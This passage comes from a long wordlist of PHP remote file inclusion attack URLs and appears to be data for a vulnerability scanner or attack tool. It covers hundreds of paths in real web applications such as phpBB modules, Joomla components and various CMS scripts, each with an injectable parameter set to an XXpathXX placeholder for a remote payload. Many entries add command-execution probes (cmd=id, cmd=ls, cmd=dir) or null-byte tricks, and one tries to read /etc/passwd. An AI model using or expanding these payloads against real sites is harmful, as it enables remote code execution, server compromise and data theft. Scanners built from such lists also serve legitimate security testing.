r/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id\n/fcring.php?s_fuss=XXpathXX\n/feed.php?config[root_ordner]=XXpathXX?&cmd=id\n/feed/index2.php?m=XXpathXX\n/files/amazon-bestsellers.php?CarpPath=XXpathXX\n/files/carprss.php?CarpPath=XXpathXX\n/files/compose-attach.php3?BSX_LIBDIR=XXpathXX\n/files/compose-menu.php3?BSX_LIBDIR=XXpathXX\n/files/compose-new.php3?BSX_LIBDIR=XXpathXX\n/files/compose-send.php3?BSX_LIBDIR=XXpathXX\n/files/folder-create.php3?BSX_LIBDIR=XXpathXX\n/files/folder-delete.php3?BSX_LIBDIR=XXpathXX\n/files/folder-empty.php3?BSX_LIBDIR=XXpathXX\n/files/folder-rename.php3?BSX_LIBDIR=XXpathXX\n/files/folders.php3?BSX_LIBDIR=XXpathXX\n/files/login.php3?err=hack&BSX_HTXDIR=XXpathXX\n/files/mainfile.php?page[path]=XXpathXX?&cmd=ls\n/files/mbox-list.php3?BSX_LIBDIR=XXpathXX\n/files/message-delete.php3?BSX_LIBDIR=XXpathXX\n/files/message-forward.php3?BSX_LIBDIR=XXpathXX\n/files/message-header.php3?BSX_LIBDIR=XXpathXX\n/files/message-print.php3?BSX_LIBDIR=XXpathXX\n/files/message-read.php3?BSX_LIBDIR=XXpathXX\n/files/message-reply.php3?BSX_LIBDIR=XXpathXX\n/files/message-replyall.php3?BSX_LIBDIR=XXpathXX\n/files/message-search.php3?BSX_LIBDIR=XXpathXX\n/findix/index.php?page=XXpathXX?&cmd=id\n/fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX\n/flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX?\n/fonctions/template.php?repphp=XXpathXX?\n/fonctions_racine.php?chemin_lib=XXpathXX\n/footer.inc.php?settings[footer]=XXpathXX\n/footer.inc.php?tfooter=XXpathXX?\n/footer.php?footer_file=XXpathXX\n/footer.php?op[footer_body]=XXpathXX?\n/form.php?path=XXpathXX?&cmd=pwd\n/forum.php?cfg_file=1&fpath=XXpathXX?\n/forum/forum.php?view=XXpathXX\n/forum/forum82lib.php3?repertorylevel=XXpathXX?\n/forum/gesfil.php?repertorylevel=XXpathXX?\n/forum/lostpassword.php?repertorylevel=XXpathXX?\n/forum/mail.php?repertorylevel=XXpathXX?\n/forum/member.php?repertorylevel=XXpathXX?\n/forum/message.php?repertorylevel=XXpathXX?\n/forum/search.php?repertorylevel=XXpathXX?\n/forum/track.php?path=XXpathXX\n/frame.php?framefile=XXpathXX\n/ftp.php?path_local=XXpathXX\n/function.inc.php?path=XXpathXX\n/function.php?adminfolder=XXpathXX\n/function.php?gbpfad=XXpathXX\n/functions.php?include_path=XXpathXX\n/functions.php?pmp_rel_path=XXpathXX\n/functions.php?s[phppath]=XXpathXX\n/functions.php?set_path=XXpathXX?\n/functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX?\n/functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX?\n/functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX?\n/functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX?\n/functions/prepend_adm.php?SETS[path][physical]=XXpathXX\n/functions/prepend_adm.php?SETS[path][physical]=XXpathXX?\n/functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX?\n/functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX?\n/functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls\n/fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX\n/galerie.php?config[root_ordner]=XXpathXX?cmd=id\n/gallery/captionator.php?GALLERY_BASEDIR=XXpathXX\n/gallery/lib/content.php?include=XXpathXX?cmd=ls\n/gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX\n/gallerypath/index.php?includepath=XXpathXX\n/games.php?id=XXpathXX\n/games.php?scoreid=XXpathXX\n/gbook/includes/header.php?abspath=XXpathXX?\n/gemini/page/forums/bottom.php?lang=XXpathXX?\n/gen_m3u.php?phpbb_root_path=XXpathXX\n/genepi.php?topdir=XXpathXX\n/generate.php?ht_pfad=XXpathXX?\n/gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd\n/gestArt/aide.php3?aide=XXpathXX?\n/get_session_vars.php?path_to_smf=XXpathXX\n/getpage.php?page=online&doc_path=XXpathXX\n/global.php?abs_path=XXpathXX?\n/gorum/dbproperty.php?appDirName=XXpathXX\n/gpb/include/db.mysql.inc.php?root_path=XXpathXX?\n/gpb/include/gpb.inc.php?root_path=XXpathXX?\n/graph.php?DOCUMENT_ROOT=XXpathXX?\n/gruppen.php?config[root_ordner]=XXpathXX?&cmd=id\n/handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX\n/handlers/page/show.php?sous_rep=XXpathXX\n/head.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/header.inc.php?CssFile=XXpathXX\n/header.php?path=XXpathXX\n/header.php?wwwRoot=XXpathXX\n/help.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/help/index.php?show=XXpathXX\n/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX\n/helperfunction.php?includedir=XXpathXX\n/hioxBannerRotate.php?hm=XXpathXX\n/hioxRandomAd.php?hm=XXpathXX\n/hioxstats.php?hm=XXpathXX\n/hioxupdate.php?hm=XXpathXX\n/home.php?a=XXpathXX\n/home.php?page=XXpathXX\n/home.php?pagina=XXpathXX\n/home/www/images/doc/index2.php?type=XXpathXX\n/home1.php?ln=XXpathXX\n/home2.php?ln=XXpathXX\n/hsList.php?subdir=XXpathXX?&cmd=ls\n/htdocs/gmapfactory/params.php?gszAppPath=XXpathXX\n/html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX\n/hu/modules/reg-new/modstart.php?mod_dir=XXpathXX?\n/i_head.php?home=XXpathXX\n/i_nav.php?home=XXpathXX\n/iframe.php?file=XXpathXX\n/image.php?url=XXpathXX???\n/impex/ImpExData.php?systempath=XXpathXX\n/import.php?bibtexrootrel=XXpathXX?\n/importinfo.php?bibtexrootrel=XXpathXX?\n/in.php?returnpath=XXpathXX\n/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX\n/inc/config.inc.php?x[1]=XXpathXX\n/inc/design.inc.php?dir[data]=XXpathXX\n/inc/download_center_lite.inc.php?script_root=XXpathXX\n/inc/formmail.inc.php?script_root=XXpathXX\n/inc/gabarits.php?cfg_racine=XXpathXX\n/inc/header.inc.php?ficStyle=XXpathXX\n/inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX\n/inc/inc.php?cfg_racine=XXpathXX?\n/inc/indexhead.php?fileloc=XXpathXX?\n/inc/irayofuncs.php?irayodirhack=XXpathXX?\n/inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX?\n/inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX?\n/inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX?\n/inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX?\n/inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX?\n/inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX?\n/inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX?\n/inc/linkbar.php?cfile=XXpathXX?\n/inc/login.php?pathCGX=XXpathXX\n/inc/logingecon.php?pathCGX=XXpathXX\n/inc/ltdialogo.php?pathCGX=XXpathXX\n/inc/mtdialogo.php?pathCGX=XXpathXX\n/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX?\n/inc/prepend.inc.php?path=XXpathXX?\n/inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX?\n/inc/settings.php?inc_dir=XXpathXX\n/inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX?\n/inc/shows.inc.php?cutepath=XXpathXX?\n/inc/sige_init.php?SYS_PATH=XXpathXX?\n/inc_group.php?include_path=XXpathXX?\n/inc_manager.php?include_path=XXpathXX?\n/inc_newgroup.php.php?include_path=XXpathXX?\n/inc_smb_conf.php?include_path=XXpathXX?\n/inc_user.php?include_path=XXpathXX?\n/include.php?_APP_RELATIVE_PATH=XXpathXX\n/include.php?gorumDir=XXpathXX\n/include.php?myng_root=XXpathXX\n/include.php?path=psp/user.php&site=XXpathXX\n/include.php?path[docroot]=XXpathXX\n/include.php?sunPath=XXpathXX\n/include/Beautifier/Core.php?BEAUT_PATH=XXpathXX\n/include/HTML_oben.php?include_path=XXpathXX\n/include/HTML_oben.php?include_path=XXpathXX?\n/include/SQuery/gameSpy2.php?libpath=XXpathXX\n/include/bbs.lib.inc.php?site_path=XXpathXX\n/include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX\n/include/classes.php?INCLUDE_DIR=XXpathXX?\n/include/client.php?INCLUDE_DIR=XXpathXX?\n/include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX\n/include/cls_listorders.php?INCLUDE_PATH=XXpathXX\n/include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX\n/include/common.php?XOOPS_ROOT_PATH=XXpathXX\n/include/common_functions.php?baros_path=XXpathXX?\n/include/config.inc.php?racine=XXpathXX\n/include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls\n/include/customize.php?l=XXpathXX&text=Hello%20World\n/include/default_header.php?script_path=XXpathXX\n/include/define.php?INC_DIR=XXpathXX?\n/include/disp_form.php3?cfg_include_dir=XXpathXX?\n/include/disp_smileys.php3?cfg_include_dir=XXpathXX?\n/include/dom.php?path=XXpathXX\n/include/dtd.php?path=XXpathXX\n/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX?\n/include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX\n/include/forms.php?INCLUDE_DIR=XXpathXX?\n/include/global.php?pfad=XXpathXX\n/include/header.php?cs_base_path=XXpathXX?\n/include/html/nettools.popup.php?DIR=XXpathXX\n/include/inc.foot.php?root=XXpathXX\n/include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX\n/include/inc_freigabe.php?include_path=XXpathXX?\n/include/inc_freigabe1.php?include_path=XXpathXX?\n/include/inc_freigabe3.php?include_path=XXpathXX?\n/include/include_stream.inc.php?include_path=XXpathXX\n/include/include_top.php?g_include=XXpathXX\n/include/includes.php?include_path=XXpathXX\n/include/index.php3?cfg_include_dir=XXpathXX?\n/include/init.inc.php?G_PATH=XXpathXX\n/include/issue_edit.php?INCLUDE_DIR=XXpathXX?\n/include/lib/lib_slots.php?main_path=XXpathXX\n/include/lib/lib_stats.php?main_path=XXpathXX?\n/include/lib/lib_users.php?main_path=XXpathXX?\n/include/little_news.php3?cfg_include_dir=XXpathXX?\n/include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX?\n/include/loading.php?path_include=XXpathXX\n/include/mail.inc.php?root=XXpathXX\n/include/menu_builder.php?config[page_dir]=XXpathXX?\n/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX\n/include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX?\n/include/parser.php?path=XXpathXX\n/include/pear/IT.php?basepath=XXpathXX?\n/include/pear/ITX.php?basepath=XXpathXX?\n/include/pear/IT_Error.php?basepath=XXpathXX?\n/include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id\n/include/prodler.class.php?sPath=XXpathXX???\n/include/scripts/export_batch.inc.php?DIR=XXpathXX\n/include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX\n/include/scripts/send_email_cache.php?DIR=XXpathXX\n/include/startup.inc.php?root_path=XXpathXX?\n/include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX?\n/include/timesheet.php?config[include_dir]=XXpathXX\n/include/urights.php?CRM_inc=XXpathXX\n/includes/admin_board2.php?phpbb_root_path=XXpathXX?ls\n/includes/admin_logger.php?phpbb_root_path=XXpathXX?ls\n/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX?\n/includes/ajax_listado.php?urlModulo=XXpathXX\n/includes/archive/archive_topic.php?phpbb_root_path=XXpathXX?\n/includes/bbcb_mg.php?phpbb_root_path=XXpathXX?\n/includes/begin.inc.php?PagePrefix=XXpathXX\n/includes/blogger.php?path_prefix=XXpathXX\n/includes/class/class_tpl.php?cache_file=XXpathXX?\n/includes/class_template.php?quezza_root_path=XXpathXX\n/includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd\n/includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX\n/includes/common.php?module_root_path=XXpathXX?\n/includes/common.php?root=XXpathXX?\n/includes/common.php?root_path=XXpathXX?\n/includes/config.inc.php?racineTBS=XXpathXX\n/includes/config/master.inc.php?fm_data[root]=XXpathXX?\n/includes/connection.inc.php?PagePrefix=XXpathXX\n/includes/dbal.php?eqdkp_root_path=XXpathXX\n/includes/events.inc.php?PagePrefix=XXpathXX\n/includes/footer.html.inc.php?tc_config[app_root]=XXpathXX?\n/includes/footer.inc.php?PagePrefix=XXpathXX\n/includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX\n/includes/functions.inc.php?sitepath=XXpathXX?\n/includes/functions.php?location=XXpathXX\n/includes/functions.php?phpbb_root_path=XXpathXX\n/includes/functions.php?phpbb_root_path=XXpathXX?\n/includes/functions/auto_email_notify.php?path_prefix=XXpathXX\n/includes/functions/html_generate.php?path_prefix=XXpathXX\n/includes/functions/master.inc.php?fm_data[root]=XXpathXX?\n/includes/functions/validations.php?path_prefix=XXpathXX\n/includes/functions_admin.php?phpbb_root_path=XXpathXX?\n/includes/functions_install.php?vwar_root=XXpathXX\n/includes/functions_kb.php?phpbb_root_path=XXpathXX?\n/includes/functions_mod_user.php?phpbb_root_path=XXpathXX?\n/includes/functions_portal.php?phpbb_root_path=XXpathXX?\n/includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX?\n/includes/global.php?nbs=XXpathXX?\n/includes/header.inc.php?PagePrefix=XXpathXX\n/includes/header.inc.php?dateiPfad=XXpathXX\n/includes/include_once.php?include_file=XXpathXX\n/includes/init.php?includepath=XXpathXX?\n/includes/iplogger.php?phpbb_root_path=XXpathXX?ls\n/includes/kb_constants.php?module_root_path=XXpathXX\n/includes/lang/language.php?path_to_root=XXpathXX\n/includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX?\n/includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX?\n/includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX?\n/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX?\n/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX?\n/includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX?\n/includes/logger_engine.php?phpbb_root_path=XXpathXX\n/includes/menuleft.inc.php?PagePrefix=XXpathXX\n/includes/mkb.php?phpbb_root_path=XXpathXX?ls\n/includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX\n/includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX\n/includes/mx_common.php?module_root_path=XXpathXX?\n/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX\n/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX\n/includes/pafiledb_constants.php?module_root_path=XXpathXX\n/includes/pages.inc.php?PagePrefix=XXpathXX\n/includes/phpdig/includes/config.php?relative_script_path=XXpathXX\n/includes/profilcp_constants.php?module_root_path=XXpathXX?\n/includes/settings.inc.php?approot=XXpathXX\n/includes/template.php?myevent_path=XXpathXX\n/includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX\n/includes/tumbnail.php?config[root_ordner]=XXpathXX?\n/includes/usercp_register.php?phpbb_root_path=XXpathXX?\n/includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX?\n/includes/xhtml.php?d_root=XXpathXX?\n/index.php3?Application_Root=XXpathXX\n/index.php?1=lol&PAGES[lol]=XXpathXX\n/index.php?AML_opensite=XXpathXX\n/index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX\n/index.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/index.php?ConfigDir=XXpathXX\n/index.php?DIR_PLUGINS=XXpathXX\n/index.php?G_JGALL[inc_path]=XXpathXX%00\n/index.php?HomeDir=XXpathXX\n/index.php?Lang=AR&Page=XXpathXX\n/index.php?Madoa=XXpathXX?\n/index.php?RP_PATH=XXpathXX\n/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX\n/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX\n/index.php?abg_path=XXpathXX?\n/index.php?abs_path=XXpathXX?\n/index.php?adduser=true&lang=XXpathXX\n/index.php?adodb=XXpathXX\n/index.php?ads_file=XXpathXX\n/index.php?arquivo=XXpathXX\n/index.php?back=XXpathXX\n/index.php?base==XXpathXX\n/index.php?basePath=XXpathXX\n/index.php?bibtexrootrel=XXpathXX?\n/index.php?blog_dc_path=XXpathXX\n/index.php?blog_theme=XXpathXX\n/index.php?body=XXpathXX\n/index.php?class_path=XXpathXX?\n/index.php?classified_path=XXpathXX?\n/index.php?cms=XXpathXX?\n/index.php?config[\"sipssys\"]=XXpathXX\n/index.php?config[root_ordner]=XXpathXX?&cmd=id\n/index.php?config[root_ordner]=XXpathXX?cmd=id\n/index.php?config_atkroot=XXpathXX\n/index.php?configuration=XXpathXX\n/index.php?custom_admin_path=XXpathXX?\n/index.php?dateiPfad=XXpathXX?&cmd=ls\n/index.php?de=XXpathXX\n/index.php?dept=XXpathXX\n/index.php?do=XXpathXX\n/index.php?exec=XXpathXX?\n/index.php?ext=XXpathXX\n/index.php?faq_path=XXpathXX?&cmd=id\n/index.php?file_name[]=XXpathXX?\n/index.php?file_path=XXpathXX?\n/index.php?fileloc=XXpathXX\n/index.php?from=XXpathXX\n/index.php?func=XXpathXX?\n/index.php?function=XXpathXX\n/index.php?function=custom&custom=XXpathXX\n/index.php?gOo=XXpathXX\n/index.php?gen=XXpathXX\n/index.php?get=XXpathXX\n/index.php?home_name=XXpathXX\n/index.php?ilang=XXpathXX?\n/index.php?inc_dir=XXpathXX\n/index.php?inc_dir=XXpathXX?\n/index.php?includeDir=XXpathXX\n/index.php?includeFooter=XXpathXX\n/index.php?includesdir=XXpathXX\n/index.php?insPath=XXpathXX\n/index.php?lang=XXpathXX\n/index.php?language=XXpathXX?\n/index.php?language=en&main_page=XXpathXX\n/index.php?lizge=XXpathXX?&cmd=ls\n/index.php?lng=XXpathXX\n/index.php?load=XXpathXX\n/index.php?loadpage=XXpathXX\n/index.php?main_tabid=1&main_content=XXpathXX\n/index.php?may=XXpathXX\n/index.php?middle=XXpathXX\n/index.php?mode=XXpathXX\n/index.php?modpath=XXpathXX\n/index.php?module=PostWrap&page=XXpathXX\n/index.php?mosConfig_absolute_path=XXpathXX\n/index.php?news7[\"functions\"]=XXpathXX\n/index.php?news_include_path=XXpathXX\n/index.php?open=XXpathXX\n/index.php?option=com_custompages&cpage=XXpathXX?\n/index.php?page=XXpathXX\n/index.php?page=XXpathXX%00\n/index.php?page=XXpathXX?\n/index.php?pageXXpathXX\n/index.php?page[path]=XXpathXX?&cmd=ls\n/index.php?pagename=XXpathXX\n/index.php?pager=XXpathXX\n/index.php?pagina=XXpathXX?\n/index.php?path_to_folder=XXpathXX?cmd=id\n/index.php?pg=XXpathXX?\n/index.php?phpbb_root_path=XXpathXX\n/index.php?plugin=XXpathXX\n/index.php?principal=XXpathXX\n/index.php?proMod=XXpathXX\n/index.php?proMod=XXpathXX?cmd\n/index.php?project=XXpathXX\n/index.php?repinc=XXpathXX?\n/index.php?root_prefix=XXpathXX\n/index.php?root_prefix=XXpathXX?\n/index.php?section=XXpathXX\n/index.php?site=XXpathXX\n/index.php?site_path=XXpathXX\n/index.php?styl[top]=XXpathXX??\n/index.php?template=XXpathXX?\n/index.php?templates_dir=XXpathXX?\n/index.php?theme=XXpathXX\n/index.php?themepath=XXpathXX?\n/index.php?themesdir=XXpathXX\n/index.php?this_path=XXpathXX?\n/index.php?txt=XXpathXX\n/index.php?up=XXpathXX\n/index.php?url=XXpathXX\n/index.php?w=XXpathXX\n/index.php?way=XXpathXX??????????????\n/index1.php?=XXpathXX\n/index1.php?inc=XXpathXX\n/index1.php?inhalt=XXpathXX\n/index2.php?=XXpathXX\n/index2.php?content=XXpathXX\n/index2.php?s=XXpathXX\n/index2.php?x=XXpathXX\n/indexinfo.php?bibtexrootrel=XXpathXX?\n/indexk.php?lib_path=XXpathXX?\n/info.php?file=XXpathXX\n/inhalt.php?dateien[news]=XXpathXX?\n/init.php?API_HOME_DIR=XXpathXX\n/init.php?scriptpath=XXpathXX?\n/initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir\n/initiate.php?abs_path=XXpathXX\n/install.php?_NE[AbsPath]=XXpathXX\n/install.php?install_dir=XXpathXX\n/install/config.php?path=XXpathXX\n/install/di.php?pathtoserverdata=XXpathXX\n/install/index.php?content_php=XXpathXX\n/install/install3.php?database=none&cabsolute_path=XXpathXX\n/integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX?\n/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX?\n/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX?\n/interface/billing/billing_process.php?srcdir=XXpathXX?\n/interface/editors/-custom.php?bField[bf_data]=XXpathXX\n/interface/editors/custom.php?bField[bf_data]=XXpathXX\n/interface/new/new_patient_save.php?srcdir=XXpathXX?\n/intern/admin/?rootdir=XXpathXX\n/intern/admin/other/backup.php?admin=1&rootdir=XXpathXX\n/intern/clan/member_add.php?rootdir=XXpathXX\n/intern/config/forum.php?rootdir=XXpathXX\n/intern/config/key_2.php?rootdir=XXpathXX\n/ip.inc.php?type=1&cgipath=XXpathXX\n/ipeer_site/?page=XXpathXX?\n/joinus.php?vwar_root=XXpathXX\n/joinus.php?vwar_root=XXpathXX?&cmd=ls\n/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX?\n/joomla_path/components/com_articles.php?absolute_path=XXpathXX?\n/js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX\n/js/wptable-tinymce.php?ABSPATH=XXpathXX\n/jscript.php?my_ms[root]=XXpathXX?\n/kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX\n/kernel/loadkernel.php?installPath=XXpathXX\n/kmitaadmin/kmitam/htmlcode.php?file=XXpathXX?\n/ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX\n/lang/leslangues.php?fichier=XXpathXX\n/lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a=\n/language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX\n/language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a=\n/language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a=\n/language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a=\n/latestposts.php?forumspath=XXpathXX\n/latex.php?bibtexrootrel=XXpathXX?\n/layout/default/params.php?gConf[dir][layouts]=XXpathXX?\n/ldap/authldap.php?includePath=XXpathXX\n/learnPath/include/scormExport.inc.php?includePath=XXpathXX\n/lib.editor.inc.php?sys_path=XXpathXX?\n/lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX\n/lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX\n/lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX\n/lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX\n/lib/action/rss.php?lib=XXpathXX?\n/lib/activeutil.php?set[include_path]=XXpathXX?\n/lib/addressbook.php?GLOBALS[basedir]=XXpathXX\n/lib/armygame.php?libpath=XXpathXX\n/lib/authuser.php?root=XXpathXX\n/lib/base.php?BaseCfg[BaseDir]=XXpathXX\n/lib/connect.php?root=XXpathXX\n/lib/connected_users.lib.php3?ChatPath=XXpathXX\n/lib/connected_users.lib.php3?ChatPath=XXpathXX?\n/lib/db/mysql.class.php?root=XXpathXX\n/lib/db/postgres.class.php?root=XXpathXX\n/lib/functions.php?DOC_ROOT=XXpathXX\n/lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX?\n/lib/header.php?DOC_ROOT=XXpathXX\n/lib/language.php?_LIB_DIR=XXpathXX\n/lib/live_status.lib.php?ROOT=XXpathXX\n/lib/misc.php?root=XXpathXX\n/lib/nl/nl.php?g_strRootDir=XXpathXX\n/lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX\n/lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX\n/lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX\n/lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX\n/lib/rs.php?rootpath=XXpathXX\n/lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX\n/lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX?\n/lib/static/header.php?set_menu=XXpathXX\n/lib/tpl.inc.php?conf[classpath]=XXpathXX\n/libraries/comment/postComment.php?path[cb]=XXpathXX?a=\n/libraries/database.php?path=XXpathXX???\n/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX\n/libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX\n/library/authorize.php?login_form=XXpathXX?\n/library/translation.inc.php?GLOBALS[srcdir]=XXpathXX?\n/libs/db.php?path_local=XXpathXX\n/libs/ftp.php?path_local=XXpathXX\n/libs/lom.php?ETCDIR=XXpathXX\n/libsecure.php?abs_path=XXpathXX?\n/license.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/link_main.php?phpbb_root_path=XXpathXX\n/linkadmin.php?page=XXpathXX?\n/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX?\n/list.php?phpbb_root_path=XXpathXX\n/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX\n/lms_path/modules/welcome.php?_LIB_DIR=XXpathXX\n/load_lang.php?_SERWEB[configdir]=XXpathXX\n/load_lang.php?_SERWEB[serwebdir]=XXpathXX\n/load_phplib.php?_PHPLIB[libdir]=XXpathXX\n/loader.php?GLOBALS=XXpathXX\n/local/lib/lcUser.php?LIBDIR=XXpathXX?\n/log.php?bibtexrootrel=XXpathXX?\n/login.php3?cl_headers=XXpathXX\n/login.php?base_dir=XXpathXX\n/login.php?blog_theme=XXpathXX\n/login.php?langfile=XXpathXX\n/login.php?pachtofile=XXpathXX\n/login.php?srcdir=XXpathXX?\n/login.php?value=XXpathXX??\n/lovecms/install/index.php?step=XXpathXX?\n/m2f/m2f_cron.php?m2f_root_path=XXpathXX\n/m2f/m2f_forum.php?m2f_root_path=XXpathXX\n/m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX\n/m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX\n/maguz.php?site=XXpathXX\n/mail/childwindow.inc.php?form=XXpathXX?\n/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX?\n/mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls\n/main.inc.php?pathtoscript=XXpathXX\n/main.php?config[search_disp]=true&include_dir=XXpathXX\n/main.php?id=XXpathXX\n/main.php?include_path=XXpathXX?\n/main.php?pageURL=XXpathXX\n/main.php?pagina=XXpathXX\n/main/forum/komentar.php?site_path=XXpathXX\n/main/main.php?pi=XXpathXX\n/main/ppcbannerclick.php?INC=XXpathXX?\n/main/ppcclick.php?INC=XXpathXX?\n/main_prepend.php?_SERWEB[functionsdir]=XXpathXX\n/mainpage.php?docroot=XXpathXX?cmd\n/mamboleto.php?mosConfig_absolute_path=XXpathXX\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX\n/manage_songs.php?foing_root_path=XXpathXX\n/manager/admin/index.php?MGR=XXpathXX\n/manager/admin/p_ins.php?MGR=XXpathXX\n/manager/admin/u_ins.php?MGR=XXpathXX\n/manager/articles.php?_PX_config[manager_path]=XXpathXX\n/manager/static/view.php?propID=0&INC=XXpathXX\n/master.php?root_path=XXpathXX\n/mcNews/admin/header.php?skinfile=XXpathXX\n/mcf.php?content=XXpathXX\n/mcnews/admin/install.php?l=XXpathXX\n/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX\n/member.php?vwar_root=XXpathXX\n/member/usercp_menu.php?script_folder=XXpathXX\n/members/index.php?INC=XXpathXX?\n/members/registration.php?INC=XXpathXX?\n/members_help.php?hlp=XXpathXX?\n/membres/membreManager.php?include_path=XXpathXX?\n/menu.php3?cl_headers=XXpathXX\n/menu.php?functions_file=XXpathXX\n/mep/frame.php?chem=XXpathXX?\n/microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX\n/middle.php?file=XXpathXX\n/migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX\n/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX?\n/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX?\n/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX?\n/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX?\n/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX?\n/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX?\n/mini-pub.php/front-end/img.php?sFileName=XXpathXX?\n/minimal/wiki.php?page=XXpathXX?\n/misc/function.php3?path=XXpathXX?\n/mitglieder.